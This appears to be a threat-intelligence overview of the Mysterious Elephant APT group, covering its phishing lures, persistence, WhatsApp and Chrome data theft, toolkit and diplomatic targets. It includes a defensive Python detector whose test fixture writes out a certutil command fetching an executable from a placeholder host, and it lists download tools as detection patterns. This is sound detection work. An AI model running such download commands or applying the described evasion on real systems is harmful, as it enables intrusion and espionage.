Who are the Elephant Hackers?


Mysterious Elephant is an advanced persistent threat (APT) hacking group that Kaspersky researchers first identified in 2023, with activities continuing to evolve through 2025. The group is notable for repurposing and enhancing malware originally developed by other APT actors, such as Origami Elephant, Confucius, and SideWinder, rather than creating entirely new tools from scratch. They operate primarily as cyber espionage actors, focusing on infiltrating networks to steal sensitive information.

Key Activities

•  Initial Access: They often use spear-phishing emails with tailored lures, such as documents mimicking diplomatic correspondence (e.g., related to Pakistan’s UN Security Council bid) or Hajj-themed baits. These emails exploit vulnerabilities like CVE-2017-11882 or deliver malicious attachments via remote template injection.

•  Persistence and Execution: Once inside, they deploy PowerShell scripts for command execution and payload downloads (using built-in tools such as curl and certutil), and they establish persistence through scheduled tasks that fire on network-change events rather than on a fixed schedule, which helps the activity blend in and avoid detection.

•  Lateral Movement and Exfiltration: The group escalates privileges, moves laterally across networks, and extracts data, with a particular emphasis on stealing files from WhatsApp (e.g., shared transfers) and Chrome browsers (e.g., cookies and tokens).
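As an added example (not code from the original post or from any vendor report), the following Python flags a scheduled-task definition that combines two traits listed above: an event trigger on a network-profile change and an action that runs PowerShell, curl or certutil with URL-fetching arguments. The two task XML samples are constructed, the task names and the c2.invalid host are placeholders, and the input is assumed to be the TaskContent field that Windows Security event 4698 records when a task is created.

```python
"""Flag scheduled tasks that fire on a network change and run a download helper (added example)."""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Download helpers the post names (curl, certutil) plus the shell that invokes them.
DOWNLOAD_BINARIES = {"powershell.exe", "pwsh.exe", "curl.exe", "certutil.exe"}
DOWNLOAD_MARKERS = ("-urlcache", "downloadstring", "downloadfile",
                    "invoke-webrequest", "http://", "https://")

# Constructed samples in the Task Scheduler XML format that Windows Security
# event 4698 (task created) records in its TaskContent field. c2.invalid is a placeholder.
SUSPICIOUS_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><EventTrigger><Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Microsoft-Windows-NetworkProfile/Operational"&gt;
    &lt;Select Path="Microsoft-Windows-NetworkProfile/Operational"&gt;*&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription></EventTrigger></Triggers>
  <Actions><Exec><Command>powershell.exe</Command>
    <Arguments>-w hidden -c "certutil -urlcache -split -f http://c2.invalid/s %TEMP%\\s.exe"</Arguments></Exec></Actions>
</Task>"""
BENIGN_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\\Windows\\System32\\robocopy.exe</Command>
    <Arguments>D:\\data \\\\backup\\share /MIR</Arguments></Exec></Actions>
</Task>"""

def assess_task(task_xml):
    """Return the suspicious traits found in one task definition (empty list if none)."""
    root = ET.fromstring(task_xml)
    findings = []
    # Trait 1: an event trigger subscribed to the NetworkProfile channel, i.e. the
    # task runs whenever the host joins or leaves a network rather than on a schedule.
    for sub in root.findall(".//t:Triggers/t:EventTrigger/t:Subscription", NS):
        if "networkprofile" in (sub.text or "").lower():
            findings.append("event trigger on NetworkProfile change")
    # Trait 2: the action is a known download helper invoked with URL-fetching arguments.
    for exe in root.findall(".//t:Actions/t:Exec", NS):
        cmd = exe.findtext("t:Command", "", NS).strip().strip('"').lower()
        binary = cmd.replace("\\", "/").rsplit("/", 1)[-1]   # basename of the command
        args = exe.findtext("t:Arguments", "", NS).lower()
        if binary in DOWNLOAD_BINARIES and any(m in args for m in DOWNLOAD_MARKERS):
            findings.append(f"download via {binary}")
    return findings

def triage(tasks):
    """Map task name -> findings, keeping only the tasks that raised any."""
    return {name: f for name, xml in tasks.items() if (f := assess_task(xml))}

if __name__ == "__main__":
    for name, hits in triage({"\\NetSync": SUSPICIOUS_TASK, "\\NightlyBackup": BENIGN_TASK}).items():
        print(name, "->", "; ".join(hits))
```

Either trait alone produces false positives (network-triggered tasks and certutil both have legitimate uses), so the check reports them separately and a task that shows both is the one worth pulling for review.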

Targets

Their campaigns predominantly target government entities and diplomatic institutions in the Asia-Pacific region, including:

•  Pakistan (heavy focus on foreign affairs and diplomatic sectors)

•  Bangladesh, Afghanistan, Nepal, and Sri Lanka

Attacks are highly targeted, with customized payloads for specific individuals or organizations.

Tools and Tactics

Mysterious Elephant employs a modular toolkit blending custom and modified open-source components:

•  Downloaders and Loaders: Vtyrei (an early downloader), MemLoader HidenDesk (reflective PE loader with RC4 decryption for Remcos RAT, sandbox evasion via process checks and hidden desktops), MemLoader Edge (XOR-decrypted PE loader with connectivity tests to bing.com).

•  Backdoors and Shells: BabShell (C++ reverse shell for system reconnaissance and command execution).

•  Exfiltration Tools: Uplo Exfiltrator and Stom Exfiltrator (for WhatsApp files, using XOR/Base64 and depth-first searches), ChromeStealer Exfiltrator (for browser data).

•  Infrastructure: They leverage VPS/cloud services with wildcard DNS domains for command-and-control (C2) servers, favoring providers that allow quick scaling and evasion.

The group’s tactics show sophistication in evasion, such as delayed executions and themed baits tied to current events, making them a growing threat to regional diplomatic security. As of late 2025, no definitive attribution to a nation-state has been publicly confirmed, though their focus suggests state-sponsored motives.
